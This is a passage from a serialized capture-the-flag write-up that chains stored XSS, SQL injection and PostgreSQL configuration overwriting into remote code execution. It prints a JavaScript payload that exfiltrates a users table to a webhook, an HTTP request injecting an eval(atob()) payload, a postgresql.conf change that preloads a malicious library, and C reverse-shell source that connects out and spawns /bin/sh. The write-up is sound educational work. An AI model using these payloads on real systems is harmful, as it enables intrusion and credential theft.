306},[8118],{"type":38,"value":7584},{"type":33,"tag":128,"props":8120,"children":8121},{"style":312},[8122],{"type":38,"value":5815},{"type":33,"tag":128,"props":8124,"children":8125},{"class":130,"line":739},[8126,8131,8136,8140],{"type":33,"tag":128,"props":8127,"children":8128},{"style":135},[8129],{"type":38,"value":8130},"setTimeout",{"type":33,"tag":128,"props":8132,"children":8133},{"style":312},[8134],{"type":38,"value":8135},"(()",{"type":33,"tag":128,"props":8137,"children":8138},{"style":312},[8139],{"type":38,"value":5625},{"type":33,"tag":128,"props":8141,"children":8142},{"style":312},[8143],{"type":38,"value":762},{"type":33,"tag":128,"props":8145,"children":8146},{"class":130,"line":765},[8147,8152,8156,8160,8164,8168,8172,8176,8180,8184,8188,8192,8196,8200,8204,8208,8212,8216,8221,8226,8231,8235],{"type":33,"tag":128,"props":8148,"children":8149},{"style":306},[8150],{"type":38,"value":8151}," document",{"type":33,"tag":128,"props":8153,"children":8154},{"style":312},[8155],{"type":38,"value":215},{"type":33,"tag":128,"props":8157,"children":8158},{"style":135},[8159],{"type":38,"value":7764},{"type":33,"tag":128,"props":8161,"children":8162},{"style":312},[8163],{"type":38,"value":5566},{"type":33,"tag":128,"props":8165,"children":8166},{"style":676},[8167],{"type":38,"value":6040},{"type":33,"tag":128,"props":8169,"children":8170},{"style":140},[8171],{"type":38,"value":7584},{"type":33,"tag":128,"props":8173,"children":8174},{"style":676},[8175],{"type":38,"value":6040},{"type":33,"tag":128,"props":8177,"children":8178},{"style":312},[8179],{"type":38,"value":6700},{"type":33,"tag":128,"props":8181,"children":8182},{"style":306},[8183],{"type":38,"value":7789},{"type":33,"tag":128,"props":8185,"children":8186},{"style":312},[8187],{"type":38,"value":215},{"type":33,"tag":128,"props":8189,"children":8190},{"style":306},[8191],{"type":38,"value":7695},{"type":33,"tag":128,"props":8193,"children":8194},{"style":312},[8195],{"type":38,"value":215},{"type":33,"tag":128,"props":8197,"children":8198},{"style":135},[8199],{"type":38,"value":7806},{"type":33,"tag":128,"props":8201,"children":8202},{"style":312},[8203],{"type":38,"value":5566},{"type":33,"tag":128,"props":8205,"children":8206},{"style":676},[8207],{"type":38,"value":6040},{"type":33,"tag":128,"props":8209,"children":8210},{"style":140},[8211],{"type":38,"value":243},{"type":33,"tag":128,"props":8213,"children":8214},{"style":676},[8215],{"type":38,"value":6040},{"type":33,"tag":128,"props":8217,"children":8218},{"style":312},[8219],{"type":38,"value":8220},")[",{"type":33,"tag":128,"props":8222,"children":8223},{"style":523},[8224],{"type":38,"value":8225},"3",{"type":33,"tag":128,"props":8227,"children":8228},{"style":312},[8229],{"type":38,"value":8230},"].",{"type":33,"tag":128,"props":8232,"children":8233},{"style":135},[8234],{"type":38,"value":7852},{"type":33,"tag":128,"props":8236,"children":8237},{"style":312},[8238],{"type":38,"value":7857},{"type":33,"tag":128,"props":8240,"children":8241},{"class":130,"line":804},[8242,8247,8251,8255],{"type":33,"tag":128,"props":8243,"children":8244},{"style":135},[8245],{"type":38,"value":8246}," setTimeout",{"type":33,"tag":128,"props":8248,"children":8249},{"style":312},[8250],{"type":38,"value":8135},{"type":33,"tag":128,"props":8252,"children":8253},{"style":312},[8254],{"type":38,"value":5625},{"type":33,"tag":128,"props":8256,"children":8257},{"style":312},[8258],{"type":38,"value":762},{"type":33,"tag":128,"props":8260,"children":8261},{"class":130,"line":839},[8262,8267,8271,8276,8280,8284,8289,8293,8298,8303,8307,8311,8315,8319,8323,8327,8331,8335,8339,8343,8347,8351,8355,8359,8363,8367,8371,8375,8379,8383,8387,8392],{"type":33,"tag":128,"props":8263,"children":8264},{"style":306},[8265],{"type":38,"value":8266}," window",{"type":33,"tag":128,"props":8268,"children":8269},{"style":312},[8270],{"type":38,"value":215},{"type":33,"tag":128,"props":8272,"children":8273},{"style":306},[8274],{"type":38,"value":8275},"location",{"type":33,"tag":128,"props":8277,"children":8278},{"style":312},[8279],{"type":38,"value":5657},{"type":33,"tag":128,"props":8281,"children":8282},{"style":676},[8283],{"type":38,"value":6739},{"type":33,"tag":128,"props":8285,"children":8286},{"style":140},[8287],{"type":38,"value":8288},"//\u003CWEBHOOK>/?userstable=",{"type":33,"tag":128,"props":8290,"children":8291},{"style":676},[8292],{"type":38,"value":6040},{"type":33,"tag":128,"props":8294,"children":8295},{"style":300},[8296],{"type":38,"value":8297}," +",{"type":33,"tag":128,"props":8299,"children":8300},{"style":135},[8301],{"type":38,"value":8302}," btoa",{"type":33,"tag":128,"props":8304,"children":8305},{"style":312},[8306],{"type":38,"value":5566},{"type":33,"tag":128,"props":8308,"children":8309},{"style":306},[8310],{"type":38,"value":7695},{"type":33,"tag":128,"props":8312,"children":8313},{"style":312},[8314],{"type":38,"value":215},{"type":33,"tag":128,"props":8316,"children":8317},{"style":135},[8318],{"type":38,"value":7764},{"type":33,"tag":128,"props":8320,"children":8321},{"style":312},[8322],{"type":38,"value":5566},{"type":33,"tag":128,"props":8324,"children":8325},{"style":676},[8326],{"type":38,"value":6040},{"type":33,"tag":128,"props":8328,"children":8329},{"style":140},[8330],{"type":38,"value":7584},{"type":33,"tag":128,"props":8332,"children":8333},{"style":676},[8334],{"type":38,"value":6040},{"type":33,"tag":128,"props":8336,"children":8337},{"style":312},[8338],{"type":38,"value":6700},{"type":33,"tag":128,"props":8340,"children":8341},{"style":306},[8342],{"type":38,"value":7789},{"type":33,"tag":128,"props":8344,"children":8345},{"style":312},[8346],{"type":38,"value":215},{"type":33,"tag":128,"props":8348,"children":8349},{"style":306},[8350],{"type":38,"value":7695},{"type":33,"tag":128,"props":8352,"children":8353},{"style":312},[8354],{"type":38,"value":215},{"type":33,"tag":128,"props":8356,"children":8357},{"style":306},[8358],{"type":38,"value":5671},{"type":33,"tag":128,"props":8360,"children":8361},{"style":312},[8362],{"type":38,"value":215},{"type":33,"tag":128,"props":8364,"children":8365},{"style":135},[8366],{"type":38,"value":7764},{"type":33,"tag":128,"props":8368,"children":8369},{"style":312},[8370],{"type":38,"value":5566},{"type":33,"tag":128,"props":8372,"children":8373},{"style":676},[8374],{"type":38,"value":6040},{"type":33,"tag":128,"props":8376,"children":8377},{"style":140},[8378],{"type":38,"value":7961},{"type":33,"tag":128,"props":8380,"children":8381},{"style":676},[8382],{"type":38,"value":6040},{"type":33,"tag":128,"props":8384,"children":8385},{"style":312},[8386],{"type":38,"value":6700},{"type":33,"tag":128,"props":8388,"children":8389},{"style":306},[8390],{"type":38,"value":8391},"innerHTML",{"type":33,"tag":128,"props":8393,"children":8394},{"style":312},[8395],{"type":38,"value":2427},{"type":33,"tag":128,"props":8397,"children":8398},{"class":130,"line":848},[8399,8404,8409],{"type":33,"tag":128,"props":8400,"children":8401},{"style":312},[8402],{"type":38,"value":8403}," },",{"type":33,"tag":128,"props":8405,"children":8406},{"style":523},[8407],{"type":38,"value":8408}," 1000",{"type":33,"tag":128,"props":8410,"children":8411},{"style":312},[8412],{"type":38,"value":5815},{"type":33,"tag":128,"props":8414,"children":8415},{"class":130,"line":976},[8416,8421,8425],{"type":33,"tag":128,"props":8417,"children":8418},{"style":312},[8419],{"type":38,"value":8420},"},",{"type":33,"tag":128,"props":8422,"children":8423},{"style":523},[8424],{"type":38,"value":8408},{"type":33,"tag":128,"props":8426,"children":8427},{"style":312},[8428],{"type":38,"value":5815},{"type":33,"tag":47,"props":8430,"children":8431},{},[8432],{"type":38,"value":8433},"To more easily trigger our payload, we will encode it in base64 and evaluate it using the eval function. We can then send it and add it to a bid like this:",{"type":33,"tag":114,"props":8435,"children":8436},{"lang":1561},[8437],{"type":33,"tag":119,"props":8438,"children":8440},{"className":1565,"code":8439,"language":1561,"meta":8,"style":8},"POST /api/auctions/2/bids HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 58\nCookie: connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n\n{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror='eval(atob(`bGV0IGlmcmFtZSA9[..SNIP..]pOw==`))'>'>\" }}\n",[8441],{"type":33,"tag":105,"props":8442,"children":8443},{"__ignoreMap":8},[8444,8468,8479,8490,8501,8512,8519],{"type":33,"tag":128,"props":8445,"children":8446},{"class":130,"line":131},[8447,8451,8456,8460,8464],{"type":33,"tag":128,"props":8448,"children":8449},{"style":1576},[8450],{"type":38,"value":1406},{"type":33,"tag":128,"props":8452,"children":8453},{"style":323},[8454],{"type":38,"value":8455}," /api/auctions/2/bids ",{"type":33,"tag":128,"props":8457,"children":8458},{"style":1576},[8459],{"type":38,"value":7362},{"type":33,"tag":128,"props":8461,"children":8462},{"style":323},[8463],{"type":38,"value":7367},{"type":33,"tag":128,"props":8465,"children":8466},{"style":523},[8467],{"type":38,"value":7372},{"type":33,"tag":128,"props":8469,"children":8470},{"class":130,"line":362},[8471,8475],{"type":33,"tag":128,"props":8472,"children":8473},{"style":1576},[8474],{"type":38,"value":1591},{"type":33,"tag":128,"props":8476,"children":8477},{"style":140},[8478],{"type":38,"value":7384},{"type":33,"tag":128,"props":8480,"children":8481},{"class":130,"line":403},[8482,8486],{"type":33,"tag":128,"props":8483,"children":8484},{"style":1576},[8485],{"type":38,"value":1630},{"type":33,"tag":128,"props":8487,"children":8488},{"style":140},[8489],{"type":38,"value":1635},{"type":33,"tag":128,"props":8491,"children":8492},{"class":130,"line":739},[8493,8497],{"type":33,"tag":128,"props":8494,"children":8495},{"style":1576},[8496],{"type":38,"value":1643},{"type":33,"tag":128,"props":8498,"children":8499},{"style":140},[8500],{"type":38,"value":7407},{"type":33,"tag":128,"props":8502,"children":8503},{"class":130,"line":765},[8504,8508],{"type":33,"tag":128,"props":8505,"children":8506},{"style":1576},[8507],{"type":38,"value":7415},{"type":33,"tag":128,"props":8509,"children":8510},{"style":140},[8511],{"type":38,"value":7420},{"type":33,"tag":128,"props":8513,"children":8514},{"class":130,"line":804},[8515],{"type":33,"tag":128,"props":8516,"children":8517},{"emptyLinePlaceholder":896},[8518],{"type":38,"value":899},{"type":33,"tag":128,"props":8520,"children":8521},{"class":130,"line":839},[8522,8526,8530,8534,8538,8542,8546,8550,8554,8558,8562,8566,8570,8574,8578,8582,8586,8591,8595],{"type":33,"tag":128,"props":8523,"children":8524},{"style":312},[8525],{"type":38,"value":7246},{"type":33,"tag":128,"props":8527,"children":8528},{"style":656},[8529],{"type":38,"value":669},{"type":33,"tag":128,"props":8531,"children":8532},{"style":437},[8533],{"type":38,"value":6634},{"type":33,"tag":128,"props":8535,"children":8536},{"style":656},[8537],{"type":38,"value":669},{"type":33,"tag":128,"props":8539,"children":8540},{"style":312},[8541],{"type":38,"value":7263},{"type":33,"tag":128,"props":8543,"children":8544},{"style":656},[8545],{"type":38,"value":669},{"type":33,"tag":128,"props":8547,"children":8548},{"style":437},[8549],{"type":38,"value":6643},{"type":33,"tag":128,"props":8551,"children":8552},{"style":656},[8553],{"type":38,"value":669},{"type":33,"tag":128,"props":8555,"children":8556},{"style":312},[8557],{"type":38,"value":284},{"type":33,"tag":128,"props":8559,"children":8560},{"style":523},[8561],{"type":38,"value":7284},{"type":33,"tag":128,"props":8563,"children":8564},{"style":312},[8565],{"type":38,"value":5584},{"type":33,"tag":128,"props":8567,"children":8568},{"style":656},[8569],{"type":38,"value":669},{"type":33,"tag":128,"props":8571,"children":8572},{"style":437},[8573],{"type":38,"value":7297},{"type":33,"tag":128,"props":8575,"children":8576},{"style":656},[8577],{"type":38,"value":669},{"type":33,"tag":128,"props":8579,"children":8580},{"style":312},[8581],{"type":38,"value":284},{"type":33,"tag":128,"props":8583,"children":8584},{"style":676},[8585],{"type":38,"value":669},{"type":33,"tag":128,"props":8587,"children":8588},{"style":140},[8589],{"type":38,"value":8590},"a'>\u003Cimg src=x onerror='eval(atob(`bGV0IGlmcmFtZSA9[..SNIP..]pOw==`))'>'>",{"type":33,"tag":128,"props":8592,"children":8593},{"style":676},[8594],{"type":38,"value":669},{"type":33,"tag":128,"props":8596,"children":8597},{"style":312},[8598],{"type":38,"value":8599}," }}\n",{"type":33,"tag":47,"props":8601,"children":8602},{},[8603],{"type":38,"value":8604},"And finally call the bot on the page that has just been polluted with our XSS payload:",{"type":33,"tag":75,"props":8606,"children":8608},{"imgSrc":8607},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743110972/writeups/aurors-archive/send_to_bot.webp",[],{"type":33,"tag":47,"props":8610,"children":8611},{},[8612],{"type":38,"value":8613},"We can see that in our webhook we have received the passwords from the users table. We can now use the admin password to exploit the SQL injection.",{"type":33,"tag":75,"props":8615,"children":8618},{"imgSrc":8616,":width":8617},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743111675/writeups/aurors-archive/collab_get_passwords.webp","800",[],{"type":33,"tag":40,"props":8620,"children":8622},{"id":8621},"sql-injection-to-rce",[8623],{"type":38,"value":8624},"SQL Injection to RCE",{"type":33,"tag":47,"props":8626,"children":8627},{},[8628],{"type":38,"value":8629},"In the first part, we saw that in the administration section, there was an SQL injection. We also saw that the database is PostgreSQL 17, and we can see in the entrypoint that the user has superuser roles.",{"type":33,"tag":114,"props":8631,"children":8632},{"lang":116},[8633],{"type":33,"tag":119,"props":8634,"children":8636},{"className":121,"code":8635,"language":116,"meta":8,"style":8},"[..SNIP..]\n# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\necho \"[+] Setting up database and user...\"\nsu - postgres -c \"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\nDROP USER IF EXISTS appuser;\nCREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\nDROP DATABASE IF EXISTS appdb;\nCREATE DATABASE appdb OWNER appuser;\n\\c appdb\nGRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO appuser;\nGRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO appuser;\nEOF\"\n[..SNIP..]\n",[8637],{"type":33,"tag":105,"props":8638,"children":8639},{"__ignoreMap":8},[8640,8656,8664,8685,8717,8725,8733,8741,8749,8757,8765,8773,8781,8789,8801],{"type":33,"tag":128,"props":8641,"children":8642},{"class":130,"line":131},[8643,8647,8652],{"type":33,"tag":128,"props":8644,"children":8645},{"style":312},[8646],{"type":38,"value":344},{"type":33,"tag":128,"props":8648,"children":8649},{"style":323},[8650],{"type":38,"value":8651},"..SNIP..",{"type":33,"tag":128,"props":8653,"children":8654},{"style":312},[8655],{"type":38,"value":3262},{"type":33,"tag":128,"props":8657,"children":8658},{"class":130,"line":362},[8659],{"type":33,"tag":128,"props":8660,"children":8661},{"style":5541},[8662],{"type":38,"value":8663},"# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\n",{"type":33,"tag":128,"props":8665,"children":8666},{"class":130,"line":403},[8667,8672,8676,8681],{"type":33,"tag":128,"props":8668,"children":8669},{"style":437},[8670],{"type":38,"value":8671},"echo",{"type":33,"tag":128,"props":8673,"children":8674},{"style":676},[8675],{"type":38,"value":679},{"type":33,"tag":128,"props":8677,"children":8678},{"style":140},[8679],{"type":38,"value":8680},"[+] Setting up database and user...",{"type":33,"tag":128,"props":8682,"children":8683},{"style":676},[8684],{"type":38,"value":836},{"type":33,"tag":128,"props":8686,"children":8687},{"class":130,"line":739},[8688,8693,8698,8703,8708,8712],{"type":33,"tag":128,"props":8689,"children":8690},{"style":135},[8691],{"type":38,"value":8692},"su",{"type":33,"tag":128,"props":8694,"children":8695},{"style":140},[8696],{"type":38,"value":8697}," -",{"type":33,"tag":128,"props":8699,"children":8700},{"style":140},[8701],{"type":38,"value":8702}," postgres",{"type":33,"tag":128,"props":8704,"children":8705},{"style":151},[8706],{"type":38,"value":8707}," -c",{"type":33,"tag":128,"props":8709,"children":8710},{"style":676},[8711],{"type":38,"value":679},{"type":33,"tag":128,"props":8713,"children":8714},{"style":140},[8715],{"type":38,"value":8716},"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\n",{"type":33,"tag":128,"props":8718,"children":8719},{"class":130,"line":765},[8720],{"type":33,"tag":128,"props":8721,"children":8722},{"style":140},[8723],{"type":38,"value":8724},"DROP USER IF EXISTS appuser;\n",{"type":33,"tag":128,"props":8726,"children":8727},{"class":130,"line":804},[8728],{"type":33,"tag":128,"props":8729,"children":8730},{"style":140},[8731],{"type":38,"value":8732},"CREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\n",{"type":33,"tag":128,"props":8734,"children":8735},{"class":130,"line":839},[8736],{"type":33,"tag":128,"props":8737,"children":8738},{"style":140},[8739],{"type":38,"value":8740},"DROP DATABASE IF EXISTS appdb;\n",{"type":33,"tag":128,"props":8742,"children":8743},{"class":130,"line":848},[8744],{"type":33,"tag":128,"props":8745,"children":8746},{"style":140},[8747],{"type":38,"value":8748},"CREATE DATABASE appdb OWNER appuser;\n",{"type":33,"tag":128,"props":8750,"children":8751},{"class":130,"line":976},[8752],{"type":33,"tag":128,"props":8753,"children":8754},{"style":140},[8755],{"type":38,"value":8756},"\\c appdb\n",{"type":33,"tag":128,"props":8758,"children":8759},{"class":130,"line":988},[8760],{"type":33,"tag":128,"props":8761,"children":8762},{"style":140},[8763],{"type":38,"value":8764},"GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\n",{"type":33,"tag":128,"props":8766,"children":8767},{"class":130,"line":1001},[8768],{"type":33,"tag":128,"props":8769,"children":8770},{"style":140},[8771],{"type":38,"value":8772},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO appuser;\n",{"type":33,"tag":128,"props":8774,"children":8775},{"class":130,"line":1014},[8776],{"type":33,"tag":128,"props":8777,"children":8778},{"style":140},[8779],{"type":38,"value":8780},"GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\n",{"type":33,"tag":128,"props":8782,"children":8783},{"class":130,"line":1026},[8784],{"type":33,"tag":128,"props":8785,"children":8786},{"style":140},[8787],{"type":38,"value":8788},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO appuser;\n",{"type":33,"tag":128,"props":8790,"children":8791},{"class":130,"line":1038},[8792,8797],{"type":33,"tag":128,"props":8793,"children":8794},{"style":140},[8795],{"type":38,"value":8796},"EOF",{"type":33,"tag":128,"props":8798,"children":8799},{"style":676},[8800],{"type":38,"value":836},{"type":33,"tag":128,"props":8802,"children":8803},{"class":130,"line":1051},[8804,8808,8812],{"type":33,"tag":128,"props":8805,"children":8806},{"style":312},[8807],{"type":38,"value":344},{"type":33,"tag":128,"props":8809,"children":8810},{"style":323},[8811],{"type":38,"value":8651},{"type":33,"tag":128,"props":8813,"children":8814},{"style":312},[8815],{"type":38,"value":3262},{"type":33,"tag":47,"props":8817,"children":8818},{},[8819,8821,8828],{"type":38,"value":8820},"With superuser account, It is then possible to use large objects. Briefly, large objects are types in PostgreSQL that allow storing larger quantities of data than classical types like text or bytea. Large objects also allow reading and writing to the filesystem. If you want to see another writeup dealing with PostgreSQL large objects, you can check out another writeup I made on a ",{"type":33,"tag":53,"props":8822,"children":8825},{"href":8823,"rel":8824},"https://owalid.com/writeups/chatter-box#from-postgresqli-to-rce-unintended",[57],[8826],{"type":38,"value":8827},"RealWorldCTF 2024 Chatter-box",{"type":38,"value":215},{"type":33,"tag":47,"props":8830,"children":8831},{},[8832],{"type":38,"value":8833},"Basically, with a database account that can use large objects, it is quite simple to achieve RCE only with SELECT clause.",{"type":33,"tag":47,"props":8835,"children":8836},{},[8837,8839,8845,8847,8853,8855,8861],{"type":38,"value":8838},"The PostgreSQL server follows a configuration written in a file called ",{"type":33,"tag":105,"props":8840,"children":8842},{"className":8841},[],[8843],{"type":38,"value":8844},"postgresql.conf",{"type":38,"value":8846}," which is generally located in the Unix user ",{"type":33,"tag":105,"props":8848,"children":8850},{"className":8849},[],[8851],{"type":38,"value":8852},"postgres",{"type":38,"value":8854}," home directory. Some configuration entries don't require server restart for the configuration changes to take effect; it's possible to simply call the ",{"type":33,"tag":105,"props":8856,"children":8858},{"className":8857},[],[8859],{"type":38,"value":8860},"pg_reload_conf()",{"type":38,"value":8862}," function in an SQL query.",{"type":33,"tag":47,"props":8864,"children":8865},{},[8866],{"type":38,"value":8867},"Thanks to large objects, it is then possible to overwrite the configuration file with a configuration that would allow us to achieve RCE.",{"type":33,"tag":47,"props":8869,"children":8870},{},[8871],{"type":38,"value":8872},"Several techniques exist:",{"type":33,"tag":239,"props":8874,"children":8875},{},[8876,8895,8913],{"type":33,"tag":243,"props":8877,"children":8878},{},[8879,8885,8887,8894],{"type":33,"tag":105,"props":8880,"children":8882},{"className":8881},[],[8883],{"type":38,"value":8884},"ssl_passphrase_command",{"type":38,"value":8886}," (by ",{"type":33,"tag":53,"props":8888,"children":8891},{"href":8889,"rel":8890},"https://pulsesecurity.co.nz/articles/postgres-sqli",[57],[8892],{"type":38,"value":8893},"Denis Andzakovic",{"type":38,"value":2966},{"type":33,"tag":243,"props":8896,"children":8897},{},[8898,8904,8905,8912],{"type":33,"tag":105,"props":8899,"children":8901},{"className":8900},[],[8902],{"type":38,"value":8903},"archive_command",{"type":38,"value":8886},{"type":33,"tag":53,"props":8906,"children":8909},{"href":8907,"rel":8908},"https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3",[57],[8910],{"type":38,"value":8911},"sylsTyping",{"type":38,"value":2966},{"type":33,"tag":243,"props":8914,"children":8915},{},[8916,8922,8923,8930],{"type":33,"tag":105,"props":8917,"children":8919},{"className":8918},[],[8920],{"type":38,"value":8921},"session_preload_libraries",{"type":38,"value":8886},{"type":33,"tag":53,"props":8924,"children":8927},{"href":8925,"rel":8926},"https://adeadfed.com/posts/postgresql-select-only-rce/",[57],[8928],{"type":38,"value":8929},"adeadfed",{"type":38,"value":2966},{"type":33,"tag":47,"props":8932,"children":8933},{},[8934,8936,8941],{"type":38,"value":8935},"At first, I tried to exploit it in the same way as during RealWorldCTF using the ",{"type":33,"tag":105,"props":8937,"children":8939},{"className":8938},[],[8940],{"type":38,"value":8884},{"type":38,"value":8942}," configuration, but the exploit didn't seem to work with the challenge configuration, so I focused on the configuration with the library.",{"type":33,"tag":114,"props":8944,"children":8946},{"lang":8945},"conf",[8947],{"type":33,"tag":119,"props":8948,"children":8951},{"className":8949,"code":8950,"language":8945,"meta":8,"style":8},"language-conf shiki shiki-themes vitesse-dark","# - Shared Library Preloading -\n\nsession_preload_libraries = 'payload.so'\n#shared_preload_libraries = '' # (change requires restart)\n#jit_provider = 'llvmjit' # JIT library to use\n\n# - Other Defaults -\n\ndynamic_library_path = '/tmp:$libdir'\n#gin_fuzzy_search_limit = 0\n",[8952],{"type":33,"tag":105,"props":8953,"children":8954},{"__ignoreMap":8},[8955,8963,8970,8978,8986,8994,9001,9009,9016,9024],{"type":33,"tag":128,"props":8956,"children":8957},{"class":130,"line":131},[8958],{"type":33,"tag":128,"props":8959,"children":8960},{},[8961],{"type":38,"value":8962},"# - Shared Library Preloading -\n",{"type":33,"tag":128,"props":8964,"children":8965},{"class":130,"line":362},[8966],{"type":33,"tag":128,"props":8967,"children":8968},{"emptyLinePlaceholder":896},[8969],{"type":38,"value":899},{"type":33,"tag":128,"props":8971,"children":8972},{"class":130,"line":403},[8973],{"type":33,"tag":128,"props":8974,"children":8975},{},[8976],{"type":38,"value":8977},"session_preload_libraries = 'payload.so'\n",{"type":33,"tag":128,"props":8979,"children":8980},{"class":130,"line":739},[8981],{"type":33,"tag":128,"props":8982,"children":8983},{},[8984],{"type":38,"value":8985},"#shared_preload_libraries = '' # (change requires restart)\n",{"type":33,"tag":128,"props":8987,"children":8988},{"class":130,"line":765},[8989],{"type":33,"tag":128,"props":8990,"children":8991},{},[8992],{"type":38,"value":8993},"#jit_provider = 'llvmjit' # JIT library to use\n",{"type":33,"tag":128,"props":8995,"children":8996},{"class":130,"line":804},[8997],{"type":33,"tag":128,"props":8998,"children":8999},{"emptyLinePlaceholder":896},[9000],{"type":38,"value":899},{"type":33,"tag":128,"props":9002,"children":9003},{"class":130,"line":839},[9004],{"type":33,"tag":128,"props":9005,"children":9006},{},[9007],{"type":38,"value":9008},"# - Other Defaults -\n",{"type":33,"tag":128,"props":9010,"children":9011},{"class":130,"line":848},[9012],{"type":33,"tag":128,"props":9013,"children":9014},{"emptyLinePlaceholder":896},[9015],{"type":38,"value":899},{"type":33,"tag":128,"props":9017,"children":9018},{"class":130,"line":976},[9019],{"type":33,"tag":128,"props":9020,"children":9021},{},[9022],{"type":38,"value":9023},"dynamic_library_path = '/tmp:$libdir'\n",{"type":33,"tag":128,"props":9025,"children":9026},{"class":130,"line":988},[9027],{"type":33,"tag":128,"props":9028,"children":9029},{},[9030],{"type":38,"value":9031},"#gin_fuzzy_search_limit = 0\n",{"type":33,"tag":47,"props":9033,"children":9034},{},[9035,9037,9043,9045,9051,9053,9059],{"type":38,"value":9036},"Here our final rce payload will be named ",{"type":33,"tag":105,"props":9038,"children":9040},{"className":9039},[],[9041],{"type":38,"value":9042},"payload.so",{"type":38,"value":9044}," and will be in the ",{"type":33,"tag":105,"props":9046,"children":9048},{"className":9047},[],[9049],{"type":38,"value":9050},"/tmp",{"type":38,"value":9052}," directory which we can see through the ",{"type":33,"tag":105,"props":9054,"children":9056},{"className":9055},[],[9057],{"type":38,"value":9058},"dynamic_librairy_path",{"type":38,"value":9060}," entry.",{"type":33,"tag":47,"props":9062,"children":9063},{},[9064],{"type":38,"value":9065},"Our code that will need to be compiled is this:",{"type":33,"tag":114,"props":9067,"children":9068},{"lang":330},[9069],{"type":33,"tag":119,"props":9070,"children":9073},{"className":9071,"code":9072,"language":330,"meta":8,"style":8},"language-c shiki shiki-themes vitesse-dark","// payload.c\n#include \u003Cstdio.h>\n#include \u003Csys/socket.h>\n#include \u003Csys/types.h>\n#include \u003Cstdlib.h>\n#include \u003Cunistd.h>\n#include \u003Cnetinet/in.h>\n#include \u003Carpa/inet.h>\n#include \"postgres.h\"\n#include \"fmgr.h\"\n\n#ifdef PG_MODULE_MAGIC\nPG_MODULE_MAGIC;\n#endif\n\nvoid _init() {\n /*\n code taken from https://www.revshells.com/\n */\n\n int port = 9999;\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET;\n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr(\"[REDACTED]\");\n\n connect(sockt, (struct sockaddr *) &revsockaddr,\n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {\"/bin/sh\", NULL};\n execve(\"/bin/sh\", argv, NULL);\n}\n",[9074],{"type":33,"tag":105,"props":9075,"children":9076},{"__ignoreMap":8},[9077,9085,9112,9136,9160,9184,9208,9232,9256,9280,9304,9311,9328,9340,9352,9359,9381,9389,9397,9405,9412,9438,9455,9462,9514,9544,9582,9637,9644,9702,9723,9751,9779,9807,9814,9877,9921],{"type":33,"tag":128,"props":9078,"children":9079},{"class":130,"line":131},[9080],{"type":33,"tag":128,"props":9081,"children":9082},{"style":5541},[9083],{"type":38,"value":9084},"// payload.c\n",{"type":33,"tag":128,"props":9086,"children":9087},{"class":130,"line":362},[9088,9093,9098,9103,9108],{"type":33,"tag":128,"props":9089,"children":9090},{"style":312},[9091],{"type":38,"value":9092},"#",{"type":33,"tag":128,"props":9094,"children":9095},{"style":1576},[9096],{"type":38,"value":9097},"include",{"type":33,"tag":128,"props":9099,"children":9100},{"style":676},[9101],{"type":38,"value":9102}," \u003C",{"type":33,"tag":128,"props":9104,"children":9105},{"style":140},[9106],{"type":38,"value":9107},"stdio.h",{"type":33,"tag":128,"props":9109,"children":9110},{"style":676},[9111],{"type":38,"value":6097},{"type":33,"tag":128,"props":9113,"children":9114},{"class":130,"line":403},[9115,9119,9123,9127,9132],{"type":33,"tag":128,"props":9116,"children":9117},{"style":312},[9118],{"type":38,"value":9092},{"type":33,"tag":128,"props":9120,"children":9121},{"style":1576},[9122],{"type":38,"value":9097},{"type":33,"tag":128,"props":9124,"children":9125},{"style":676},[9126],{"type":38,"value":9102},{"type":33,"tag":128,"props":9128,"children":9129},{"style":140},[9130],{"type":38,"value":9131},"sys/socket.h",{"type":33,"tag":128,"props":9133,"children":9134},{"style":676},[9135],{"type":38,"value":6097},{"type":33,"tag":128,"props":9137,"children":9138},{"class":130,"line":739},[9139,9143,9147,9151,9156],{"type":33,"tag":128,"props":9140,"children":9141},{"style":312},[9142],{"type":38,"value":9092},{"type":33,"tag":128,"props":9144,"children":9145},{"style":1576},[9146],{"type":38,"value":9097},{"type":33,"tag":128,"props":9148,"children":9149},{"style":676},[9150],{"type":38,"value":9102},{"type":33,"tag":128,"props":9152,"children":9153},{"style":140},[9154],{"type":38,"value":9155},"sys/types.h",{"type":33,"tag":128,"props":9157,"children":9158},{"style":676},[9159],{"type":38,"value":6097},{"type":33,"tag":128,"props":9161,"children":9162},{"class":130,"line":765},[9163,9167,9171,9175,9180],{"type":33,"tag":128,"props":9164,"children":9165},{"style":312},[9166],{"type":38,"value":9092},{"type":33,"tag":128,"props":9168,"children":9169},{"style":1576},[9170],{"type":38,"value":9097},{"type":33,"tag":128,"props":9172,"children":9173},{"style":676},[9174],{"type":38,"value":9102},{"type":33,"tag":128,"props":9176,"children":9177},{"style":140},[9178],{"type":38,"value":9179},"stdlib.h",{